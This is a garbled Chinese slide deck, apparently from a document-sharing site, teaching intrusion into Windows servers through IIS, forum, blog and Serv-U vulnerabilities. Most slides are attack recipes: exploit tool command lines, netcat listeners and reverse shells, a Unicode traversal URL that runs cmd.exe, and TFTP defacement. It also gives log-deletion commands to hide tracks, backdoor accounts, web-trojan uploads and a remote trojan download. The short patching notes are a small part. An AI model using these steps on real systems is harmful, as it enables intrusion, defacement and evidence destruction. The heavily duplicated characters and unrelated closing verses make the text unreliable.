服务器入侵免费奉送_第1页
服务器入侵免费奉送_第2页
服务器入侵免费奉送_第3页
服务器入侵免费奉送_第4页
服务器入侵免费奉送_第5页
已阅读5页,还剩77页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

基于服务器软件漏洞的入侵随着计算机应用的进一步普及和计算机网络的高速发展,越来越多的公司或个人架设自己的网络服务。但是这些软件在给人们带来方便和好处的时候本身的缺陷却被忽略。服务器软件漏洞轻则导致服务器的信息被窃取,重则导致服务器被远程控制。本章内容IIS漏洞带来的入侵论坛系统带来的入侵Blog系统带来的入侵Serv-U带来的入侵IIS漏洞带来的入侵IIS为InternetInformationServer的缩写,是Windows系统提供的Internet服务,作为“windows组建”附加在windows系统中。通过IIS,windows系统可以方便的提供Web服务、FTP服务和SMTP服务等。IIS在方便用户使用的同时,也带来了安全隐患。据说有关IIS的安全漏洞有上千种,其中能被用来入侵的漏洞大多数属于“溢出”型漏洞。对于这种漏洞,入侵者能够通过发送特定格式的数据是远程服务器溢出,从而突破系统的保护。关于溢出漏洞.ida&.idq漏洞Painter漏洞Unicode漏洞.asp映射分块编码漏洞Webdav漏洞关于扩展引发的漏洞WindowsMedia服务nsiislog.dll远程缓冲区溢出漏洞MicrosoftFrontpageServerExtensions远程缓冲区溢出漏洞搜集IIS信息1、通过[telnet目标IP80]搜集Web服务器版本信息2、在telnet连上之后需要连敲两次回车才能得到信息3、通过[telnet目标IP21]搜集FTP服务器版本信息.ida&.idq漏洞漏洞描述IIS的indexserver.ida/.idqISAPI扩展存在缓冲区溢出漏洞影响系统IIS4.0和5.0IndexServer可以加快Web的搜索能力,提供对管理员脚本和Internet数据的查询,默认支持管理脚本.ida和查询脚本.idq,不过都是使用idq.dll来进行解析。但是存在一个缓冲区溢出,其中问题存在于idq.dll扩展程序上,由于没有对用户提交的参数进行边界检查,可以导致远程攻击者利用理出货的system全线来访问远程系统。漏洞检测手工方式:在IE中输入http://targetIP/*.ida或http://targetIP/*.idq

回车确认后如果提示“找不到**文件的信息”,就说明存在该漏洞工具检测:X-Scan在“扫描模块”中选中“IIS漏洞”,如果得到“可能存在‘IISIndexServerISAPI扩展远程溢出漏洞(/null.ida)或(/null.idq)’”则说明存在该漏洞。漏洞利用IDA入侵实例IDAHack:是基于命令行的溢出工具,能够溢出打了sp1、sp2补丁的Windows200。当远程服务器溢出后,便会在指定的端口得到一个Telnet权限Idahack<host><port><type><shellport>类型:中文win2001中文win200sp12中文win200sp23入侵思路1、扫描远程服务器,先用X-scan扫描,然后手工炎症2、使用[idahackIP801520]进行溢出3、成功后,使用[telnetIP520]远程登录服务器4、使用上一章所讲方法建立后门帐号5、exit退出IDQ入侵侵实例例IISIDQ是snake编写的的IDQ溢出工工具,,有命命令行行和图图形界界面两两种方方式,,而且且溢出出成功功后可可以选选择两两种入入侵方方式Iisidq<type><ip><port><1><lport>[命令1]Iisidq<type><ip><port><2><ip><lport>[命令1]类型::0iis5中文win20001iis5中文win2000sp12iis5中文win2000sp2溢出后后的连连接工工具-ncNc在在网络络攻击击中素素有““瑞士士军刀刀”的的美誉誉,是是入侵侵者经经常使使用的的工具具之一一。主动连连接到到外部部:nc[-option]hostport[ports]监听以以等待待外部部连接接:nc––l––pport[-option][host][port]详细讲讲解参参考帮帮助入侵思思路1、扫描描远程程服务务器,,确认认存在在IDQ溢出漏漏洞2、IDQ溢出[iisidq0IP8015211]表示以以iisidq的连接接方式式一对对ip进行IDQ溢出漏漏洞,,端口口为80,成功功后,,远程程服务务器会会打开开521号端口口等待待外部部连接接。参参数[输入命命令1]设为1,表示示不使使用默默认命命令““cmd.exe/c+dir””,而是是要在在以后后输入入新的的命令令也可以以使用用iisidq的gui工具来来实现现3、nc连接[nc––vIP521],从而而获得得具有有管理理员权权限的的shell4、建立立后门门账号号5、exit退出安全解解决方方案1、下下载安安装补补丁2、删删除对对.ida和.idq的的脚本本映射射.Printer漏漏洞扩展存存在缓缓冲区区溢出出漏洞洞影响系系统windows20003个serverWindow2000iis5.0存在打打印扩扩展ISAPI使得.printer扩展与与msw3prt.dll扩展名名到msw3prt.dll的映射射关系系,并并会处处理用用户请请求,,但在在msw3port.dll文件中中存在在缓冲冲区溢溢出漏漏洞。。“Host:”栏栏中包包含大大约420字节的的Http.printer请求给给服务务器,,就可可以导导致缓缓冲区区溢出出并执执行人人以代代码。。该攻攻击可可以使使Web服务器停止止响应。该漏洞非常常危险,仅仅需要代开开80端口或者443端口。漏洞检测使用X-Scan扫扫描IIS漏洞,如如果得到““可能存在在IIS5.0.printer远程缓冲冲区溢出漏漏洞”则说说明该服务务器存在.printer漏漏洞。漏洞利用使用工具IIS5.printerExploit进行漏洞洞利用格式:iis5exploit<Tip><Lip><lport>,稍等等片刻,如如果溢出成成功,便会会在本级nc监听的的窗口出现现,此时入入侵者就得得到了远程程服务器管管理员的shell。入侵实例1、使用[nc––l–p250]在本地地开一个监监听端口2、使用[iis5exploit<TIP><LIP><LPort>]对远程主主机进行漏漏洞溢出。。建立后门账账号退出也可以使用用iisx进行漏洞溢溢出格式:iisx<thost><sp><-p|-a|-rtiptport>Sp:0没有补丁,,1有补丁-p:如果溢出出成功,就就会在远端端打开7788端口等待连连接-a:如果溢出出成功,会会在远端添添加一个管管理员账号号hax:hax,入侵者可可以使用netuse连接远端服服务器,或或者使用DameWare实现远程控控制。-r:反向连接接,能够穿穿透部分设设置的防火火墙。入侵侵者首先在在本地nc打开监听端端口。安全解决方方案打补丁,微微软已经发发布了针对对该漏洞的的补丁Unicode目录录遍历漏洞洞微软IIS4.0或5.0扩展Unicode目录遍历漏漏洞影响系统::win2000及NT4.0IIS4.0或5.0都存在利用用扩展Unicode字符取代““/”和“\”而能利用““../”目录遍历的的漏洞。未未经授权的的用户可能能利用IUSR_machinename帐号的上下下文空间访访问任何已已知的文件件。该帐号号在默认情情况下属于于Everyone和Users组的成员,,因此任何何与Web根目录在同同一逻辑驱驱动器上的的能被这些些用户组访访问的文件件都能被删删除修改或或执行。漏洞利用从漏洞的描描述可以看看出,Unicode漏洞允许未未经授权的的用户使用用客户端IE来构造非法法字符。因因此只要入入侵者能够够狗仔出适适当的字符符如“/”“\”,就可以利利用“../”来遍历与Web根目录处在在一个逻辑辑驱动器上上的目录,,从而导致致“非法遍遍历”。这样一来来入侵者就就可以利用用该方法操操作该服务务器上的磁磁盘文件,,可以新建建、下载、、删除、执执行磁盘文文件。除此此之外,入入侵者通过过构造Unicode编码利用来来找到并打打开该服务务器上的cmd来执行命令令可以利用%c1%1c=‘/’和%c0%2f=‘\’来构造漏洞检测手工:假设设远程服务务器为win200pro,在IE地址栏中输输入[http://IP/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\],与远程服服务器连接接之后,如如果把C盘的内容列列出来了则则证明存在在该漏洞。。工具检测::使用X-scan选中“IIS漏洞”,如如果得到类类似的“/scripts/..%252f……/cmd.exe?/c+dir””就说明存在在漏洞漏洞利用利用Unicode漏洞,入入侵者能够够把IE编编程远程执执行命令的的控制台。。不过Unicode漏洞并并不是远程程溢出漏洞洞,不能拿拿到管理员员权限的shell,只能进进行简单的的文件类操操作。实例1:涂涂鸦主页1、准备一个个自己涂鸦鸦的主页2、探知远程程服务器的的Web根目录如果存在.ida&.idq可以在地址址栏中输入入[http://ip/1.ida]从而获得web根目录通过查找文文件的方法法找到远程程服务器的的Web根目录。在在地址栏中中输入[http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\mmc.gif/s]3、涂鸦主页页:可以利利用[dir+web根目录]来查找主页页4、上传主页页覆盖:在在本地打开开TFTP服务器,不不进行任何何设置,只只要把准备备好的web文件拷贝到到tftf服务器路径径下即可。。TFTP的命令:[tftp–Ihost[GET|PUT]source[dest]][tftp+IP+get+1.htm+web根目录\index.htm]来覆盖该服服务器的主主页。实例2:擦擦脚印在客户端IE浏览器中利利用Unicode编码漏洞,,使用下列列命令清除除日志文件件:Del+c:\winnt\system32\logfiles\*.*Del+c:\winnt\system32\config\*.evtDel+c:\winnt\system32\dtclog\*.*Del+c:\winnt\system32\*.logDel+c:\winnt\system32\*.txtDel+c:\winnt\*.txtDel+c:\winnt\*.log实例3::Unicode综合合利用ASP工工具—海海阳顶端端网木马马,是一一套asp在线线的网页页编辑软软件,支支持在线线更改、、编辑、、删除任任意文本本文件,,是无组组件asp上传传。1、上传传木马文文件,利利用tftp2、隐藏藏木马文文件,利利用attrib+h+s3、可以以写成一一个bat处理理文件入侵步骤骤1、把load.bat传到到远程服服务器的的C盘[tftp]2、通过过bat文件把把木马传传入该服服务的web根根目录下下。3、控制制服务器器,密码码是[]安全解决决方案打补丁进进行修修修复.asp映射分分块编码码漏洞Window2000和NT4IIS.asp映射存在在远程缓缓冲溢出出漏洞影响系统统window2000和NTASPISAPI过滤器默默认在window2000和NT4种装在,,存在的的漏洞可可以导致致远程执执行任意意命令。。恶意攻攻击者可可以使用用分块编编码形式式数据给给IIS服务器,,当解码码和解析析这些数数据的时时候可以以迫使IIS把入侵者者提供的的数据写写到内存存任意位位置。该漏洞可可以使win200产生缓冲冲区溢出出并以IWAM_computername用户的权权限执行行任意代代码。漏洞检测测使用X-scan,如如果得到到“可能能存在IIS.asp映射分分块编码码远程缓缓冲区溢溢出漏洞洞”就说说明远程程服务器器存在该该漏洞。。漏洞利用用IISaps.dlloverflowprogram2.0格式:aspcode<server>[aspfile][webport][winxp]如果键入入aspcodeIP,接着按按几下回回车键等等待一会会儿,如如果得到到c:\winnt\system32>的提示符符,就意意味着溢溢出成功功。可以通过过打补丁丁的方式式来解决决该漏洞洞WebDAV漏漏洞Windows2000ntdll.dllwebDAV接口远程程缓冲区区溢出漏漏洞影响系统统window2000系统IIS5.0带有WebDAV组件对用用户输入入的传递递给ntdll.dll程序处理理的请求求未作充充分的边边界检查查,远程程入侵者者可以通通过向WebDAV提交一个个精心构构造的超超常数据据请求而而导致发发生缓冲冲区溢出出,可能能使入侵侵者以LocalSystem的权限在在主机上上执行任任意命令令。漏洞检测测WebDAVScan是红盟盟编写的的专门用用于检测测IIS5.0中WebDAV漏洞洞的专用用扫描器器,可以以扫描一一个IP段,并并可以返返回远程程服务的的Web服务器器版本。。漏洞利用用:英文版版IIS溢出工具具,需要要与nc配合使用用,能够够突破一一定限制制的防火火墙。首先使用用nc在本地打打开一个个监听端端口[nc––vv–l–p250]然后打开开,在其中中输入远远程服务务器IP,本机IP和端口。。然后进行行漏洞溢溢出,等等一段时时间后,,如果WebDAV漏洞溢出出成功,,远程服服务器便便会与本本地的监监听端口口主动连连接,建建立连接接后,就就可以执执行任何何命令。。实例使用Webdavx3对中文版版的IIS5进行WebDAV漏洞溢出出1、使用WebDAVScan扫描WebDAV漏洞2、使用Webdavx3对远程IIS5进行溢出出3、使用telnet或者nc远程登录录服务器器4、建立后后门账号号5、退出安全解决决方案安装微软软提供的的相关补补丁WebDAV超常请求求远程拒拒绝服务务攻击漏漏洞MicrosoftIISWebDAV超常请求求远程拒拒绝服务务攻击漏漏洞影响系统统:描述:IIS5.0默认提供供了对WebDAV的支持,,WebDAV可以通过过HTTP向用户提提供远程程文件存存储的服服务。WebDAV实现对部部分模式式的超常常请求处处理不正正确,远远程攻击击者可以以利用这这个漏洞洞对IIS服务器进进行拒绝绝服务攻攻击。攻击者可可以使用用prfofind或search请求方法法,提交交包含49153字节的WebDAV请求,IIS会由于拒拒绝服务务而重新新启动。。漏洞利用用拒绝服务务攻击也也称DoS,在在这种攻攻击下,,通过阻阻塞目标标网络或或发送畸畸形数据据使远程程服务器器过载而而瘫痪,,从而不不能向任任何客户户提供服服务。通通常来说说,dos不需需要远程程服务器器存在任任何漏洞洞,完全全是恶意意攻击,,入侵者者得不到到任何权权限。实例通过WebDAV拒绝绝服务攻攻击漏洞洞使远程程IIS服务器器拒绝服服务使用Webdavdos格式webdavdosip但是该工工具的成成功几率率比较低低,其实实可以利利用webdavx3进行溢溢出,成成功后会会打开7788端口,,而80端口就就死掉了了安全解决决方案安装相应应补丁程程序WebDAVXML消息处理理远程拒拒绝服务务漏洞影响系统统:IIS6.05.15.0描述:IIS包含的WebDAV组件对特特殊构造造的WebDAV请求处理理不正确确,远程程攻击者者可以利利用这个个漏洞利利用WebDAV消耗大量量内存和和CPU时间,导导致拒绝绝服务攻攻击。攻击者可可以构建建恶意的的使用XML属性的WebDAVProffind请求,可可导致XML解析器消消耗大量量的内存存和CPU时间,造造成拒绝绝服务。。漏洞检测测使用X-scan,设设定“攻攻击测试试脚本””扫描项项目进行行扫描漏洞利用用由于需要要使用到到Perl,所所以大家家下去后后自己找找资料进进行学习习。WindowsMedia服务nsiislog.dll远程缓冲冲区溢出出漏洞影响系统统:windows2003/2000描述:MicrosoftWindows媒体服务务,支持持通过多多播流从从网络上上传送媒媒体内容容给客户户端。Windows的媒体服服务的ISAPI扩展实现现对用户户请求处处理存在在缓冲区区溢出漏漏洞,远远程攻击击者可以以利用这这个漏洞洞对服务务进行拒拒绝服务务攻击或或执行任任意命令令。在多播流流中,为为了能记记录客户户端信息息,Windows2000提供了多多播和单单播传输输进行记记录的功功能。此此功能以以ISAPI扩展实现现nsiislog.dll。Windows2000下安装的的nsiislog.dll处理超常常POST请求数据据时存在在缓冲区区溢出漏漏洞,这这可导致致供给者者发送畸畸形请求求给服务务器,使使IIS停止对Internet请求的相相应或执执行任意意命令。。漏洞检测测如果远程程计算机机打开了了WindowsMedia服务务,其主主机上会会打开1755端口,,而开放放Media服服务的远远程主机机有存在在漏洞的的可能性性。使用SuperScan来检检测主主机是是否开开放了了1755端口口。或者使使用X-scan进进行扫扫描漏洞利利用Iis.exe使用格格式::iisIPport这个工工具是是nsiislog.dll远程程缓冲冲区溢溢出漏漏洞的的专用用溢出出工具具,溢溢出成成功后后,远远程主主机会会打开开59端口口等待待入侵侵者连连接。。MicrosoftFrontPageServerExtensions远程缓缓冲区区溢出出漏洞洞影响系系统::windowsxp,2000描述::MicrosoftFrontpage服务器器扩展展是Microsoft公司开开发的的用于于加强强IISweb服务器器的功功能的的软件件包FrontpageServerExtensions存在两两个新新的安安全漏漏洞,,远程程攻击击者可可以利利用这这个漏漏洞进进行缓缓冲区区攻击击,可可能以以Frontpage进程权权限在在系统统上执执行任任意指指令。。使用X-scan进进行扫扫描使用fp30reg<tip><port>进进行溢溢出攻攻击,,溢出出成功功后绑绑定9999端端口,,同时时会获获得shell权限限。该方法法成功功的几几率比比较高高论坛系系统带带来的的入侵侵论坛是是Internet上的的一种种电子子信息息服务务系统统,它它提供供一块块公共共电子子白板板,每每个注注册用用户都都可以以在上上面发发布信信息或或者提提出看看法。。常见的的论坛坛程序序有动动网论论坛、、雷遨遨论坛坛和比比较流流行的的BBSXP论论坛主要讲讲解一一下上上传漏漏洞和和暴库库漏洞洞上传漏漏洞动网论论坛上上传漏漏洞的的存在在于DVBBS7.0sp2及其其更低低的所所有版版本中中,其其中DVBBSsp2以以前的的版本本可以以利用用工具具直接接上传传asp文文件漏洞存存在于于基本本资料料修改改中头头像上上传位位置,,单击击上传传按钮钮将调调用upfile.asp文文件,,而该该文件件存在在文件件类型型过滤滤不严严的问问题。。漏洞利利用思思路检测到到漏洞洞后,,在存存在漏漏洞论论坛中中注册册一个个用户户帐号号,利利用这这个账账号获获取Cookie,,在本本地制制作网网页木木马文文件,,使用用专用用工具具结合合已获获取的的Cookie值将将网页页木马马上传传到远远程主主机中中。搜索漏漏洞在搜索索引擎擎当中中搜索索[PoweredBy:DVbbsVersion7.0.0SP1]注册用用户因为想想要使使用上上传漏漏洞需需要进进入用用户基基本资资料设设置页页面,,因此此需要要先注注册一一个页页面,,假设设用户户名为为ccniit,密密码为为123456获取COOKIECookie是是由Internet站站点创创建的的、将将信息息存储储在计计算机机上的的文件件,可可以保保存用用户个个人的的存储储信息息,一一旦将将cookie保存存在计计算机机上,,只有有创建建Cookie的网网站才才能读读取。。COOKIE分分为永永久cookie和和临时时cookie,临临时的的浏览览器一一关闭闭就消消失,,永久久的保保存在在硬盘盘中,,下次次可以以访问问。使用WinsockExpert获获得cookie使用海海阳顶顶端网网生成成木马马程序序利用DVBBS上传利利用程程序上上传网网页木木马连接检检测成功后后就可可以做做进一一步的的入侵侵了观看视视频上上传漏漏洞的的利用用安全解解决方方案论坛系系统的的上传传漏洞洞是一一个普普遍存存在的的漏洞洞,由由于不不同论论坛系系统在在实现现方式式上存存在差差异,,因此此对于于上传传漏洞洞的修修补,,需要要到具具体的的论坛坛系统统的官官方网网站下下载相相应的的补丁丁包或或升级级程序序。暴库漏漏洞暴库是是指通通过显显示错错误信信息的的方式式把数数据库库的物物理路路径给给暴露露出来来。观看视视频教教程暴库漏漏洞利利用思思路首先检检测远远程主主机是是否存存在漏漏洞。。检测测到漏漏洞后后注册册一个个账号号,获获取Cookie信信息。。暴库库拿到到管理理员账账号、、前台台密码码和后后台密密码后后结合合已经经获得得的Cookie进进行Cookie欺欺骗,,从而而获得得管理理员权权限。。具体的的操作作看视视频教教程Blog系系统带带来的的入侵侵Blog是继Email,BBS后出现现的又又一种种网络络交流流方式式。Blog大致可可以分分成两两种形形态,,一种种是个个人创创作,,另一一种是是将个个人认认为有有趣的的有价价值的的内容容推荐荐给读读者。。常用的的Blog系统有有L-Blog,Dlog,MissLog,oBlog等。Blog在给人人们带带来便便利的的同时时,自自身也也存在在需要要完善善的地地方。。关于blog的入侵侵,介介绍下下在数数据库库漏洞洞和Cookie欺骗漏漏洞直接下下载数数据库库漏洞洞直接下下载数数据库库漏洞洞属于于设计计漏洞洞,允允许未未经授授权的的用户户通过过直接接输入入地址址下载载Blog系统统的数数据库库。下面面以以猪猪飞飞飞飞的的Dlog系系统统为为例例讲讲解解如如何何入入侵侵的的入侵侵思思路路下载载一一个个Dlog系统统,,查查看看其其结结构构得得到到数数据据库库所所在在的的默默认认位位置置。。通通过过搜搜索索引引擎擎寻寻找找存存在在漏漏洞洞的的Blog主机机,,使使用用直直接接输输入入默默认认数数据据库库路路径径的的方方式式下下载载其其数数据据库库。。查查看看已已下下载载的的数数据据库库中中的的信信息息,,获获得得管管理理员员的的相相关关信信息息。。使使用用已已经经得得到到的的管管理理员员前前后后台台账账号号登登录录到到远远程程Dlog系统统中中,,改改变变文文件件上上传传格格式式限限制制,,上上传传网网页页木木马马进进而而控控制制远远程程主主机机。。详细细步步骤骤通过过分分析析发发现现dlog的数数据据库库保保存存在在%WebRoot%\log_mdb\dlog_mdb.mdb在IE地址址栏栏中中构构造造出出路路径径,,下下载载该该数数据据库库打开开数数据据库库,,查查找找管管理理员员账账号号和和密密码码破解解经经过过MD5加密密的的密密码码获得得用用户户名名和和密密码码使用用管管理理员员的的帐帐号号和和密密码码登登录录系系统统修改改上上传传文文件件的的类类型型限限制制,,使使用用asa进进行行替替换换其其他他类类型型上传传网网页页木木马马获得得网网马马的的路路径径,,从从而而获获得得WebShell的的权权限限安全全解解决决方方案案修改改数数据据库库的的存存放放位位置置,,对数数据据库库名名称称进进行行修修改改,,同同时时更更新新数数据据库库连连接接文文件件的的内内容容。。Cookie欺欺骗骗漏漏洞洞Cookie欺欺骗骗漏漏洞洞是是由由于于系系统统对对Cookie信信息息验验证证不不严严造造成成的的。。Cookie欺欺骗骗漏漏洞洞很很容容易易被被设设计计者者忽忽略略,,因因此此网网上上有有很很多多的的信信息息发发布布系系统统都都存存在在这这个个漏漏洞洞。。Serv-U带带来来的的入入侵侵Serv-U由由两两部部分分组组成成,,引引擎擎和和用用户户界界面面,,Serv-U引引擎擎((ServUDaemon))是是一一个个常常驻驻后后台台的的程程序序,,负负责责处处理理各各种种Ftp客客户户端端软软件件的的ftp命命令令,,同同时时负负责责执执行行各各种种文文件件传传送送的的软软件件。。Serv-U用用户界面面负责与与Serv-U引擎之之间的交交互Serv-UFtp服务器MDTM命令远程程缓冲区区溢出漏漏洞影响系统统:详细描述述Serv-U在处理MDTM命令的参参数时缺缺少正确确的缓冲冲区边界界检查,,远程攻攻击者可可以利用用这个漏漏洞对Ftp服务器程程序进行行缓冲区区溢出攻攻击,可可能以Ftp进程权限限在系统统上执行行任意命命令Serv-U提供ftp命令MDTM用于用户户更改文文件时间间,当用用户成功功登陆系系统,并并发送畸畸形超长长的时区区数据作作为命令令参数,,可触发发缓冲区区溢出,,精心构构造参数数数据可可能以Ftp进程权限限在系统统上执行行任意指指令。漏洞说明明利用Serv——U服务务器MDTM命命令远程程缓冲区区溢出漏漏洞要求求Serv-U的版本本号不能能高于5.0,,同时利利用此漏漏洞需要要入侵者者能够登登录到系系统,但但不需要要写权限限或其他他权限。。这个漏漏洞实际际上是通通过对Serv-U服服务器的的溢出攻攻击入侵侵远程系系统的。。漏洞检测测因为漏洞洞是和Serv-U的的版本号号相关的的,所以以利用FlashFXP检查查出远程程ftp服务器器的类型型及版本本号即可可。漏洞利用用工具:sv.exe命令格式式:sv.exe<host><port><user><passwd>sv.exe<host><port><user><passwd><url>sv.exe<H><Port><user><passwd><yourIP><yourport>其中:host:开启服服务的主主机地址址Port:开启服服务的端端口号User:用于登登录的用用户名Pass:用于登登录的密密码Url:远程下下载地址址该工具溢溢出成功功后打开开远程主主机上8111端口共入入侵者连连接。入侵实例例1-开开启远程程主机端端口首先使用用FlashFXP检检测远程程主机的的Serv-U版本使用[svIPuserpass]进行溢溢出,溢溢出成功功后打开开8111端口口等待连连接使用[nc––vvIP8111]连连接远程程主机然后添加加账号……入侵实例例2-远远程下载载木马服服务器端端生成木马马的服务务器端漏洞检测测使用[svIP21userpass木木马所所在url]进进行溢出出攻击,,成功后后就可以以将木马马程序下下载到ftp所所在的计计算机。。Serv-U本本地权限限提升漏漏洞影响的系系统:Serv-U存在设计计问题,,本地攻攻击者可可以利用用这个漏漏洞以System权限在系系统上执执行任意意命令。。所有Serv-U存在默认认本地管管理员登登录密码码,该账账号只能能在本地地接口中中连接,,因此本本地攻击击者可以以连接Serv-U并建立拥拥有执行行权限的的FTP用户,在在这个用用户建立立后,连连接FTP服务器并并执行““SiteEXEC””命令,系系统就会会以System权限执行行。漏洞说明明从上面漏漏洞的描描述中可可以发现现这个漏漏洞的利利用原理理:在本本地连接接到Serv-U的特特定端口口,以默默认本地地管理员员密码登登录后可可以以系系统权限限执行任任意命令令。系统供Serv-U默默认本地地管理管管理员登登录的默默认端口口号为43958漏洞检测测使用FlashFXP进行版版本检测测即可漏洞利用用工具::myservu.exe格式:myservuport““command””这是利用用Serv_U软件漏漏洞进行行提升权权限的专专用工具具。Port为为Serv-U软件默默认管理理员的登登录端口口,cmd为指指定执行行的命令令。实例-利利用serv-u进行行权限的的提升观看视频频谢谢!9、静夜夜四无无邻,,荒居居旧业业贫。。。1月-231月-23Thursday,January5,202310、雨中黄叶叶树,灯下下白头人。。。20:56:0720:56:0720:561/5/20238:56:07PM11、以以我我独独沈沈久久,,愧愧君君相相见见频频。。。。1月月-2320:56:0720:56Jan-2305-Jan-2312、故人江海别别,几度隔山山川。。20:56:0720:56:0720:56Thursday,January5,202313、乍见见翻疑疑梦,,相悲悲各问问年。。。1月-231月-2320:56:0720:56:07January5,202314、他乡生生白发,,旧国见见青山。。。05一一月20238:56:07下午午20:56:071月-2315、比比不不了了得得就就不不比比,,得得不不到到的的就就不不要要。。。。。一月月238:56下下午午1月月-2320:56January5,202316、行动动出成成果,,工作作出财财富。。。2023/1/520:56:0720:56:0705January2

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论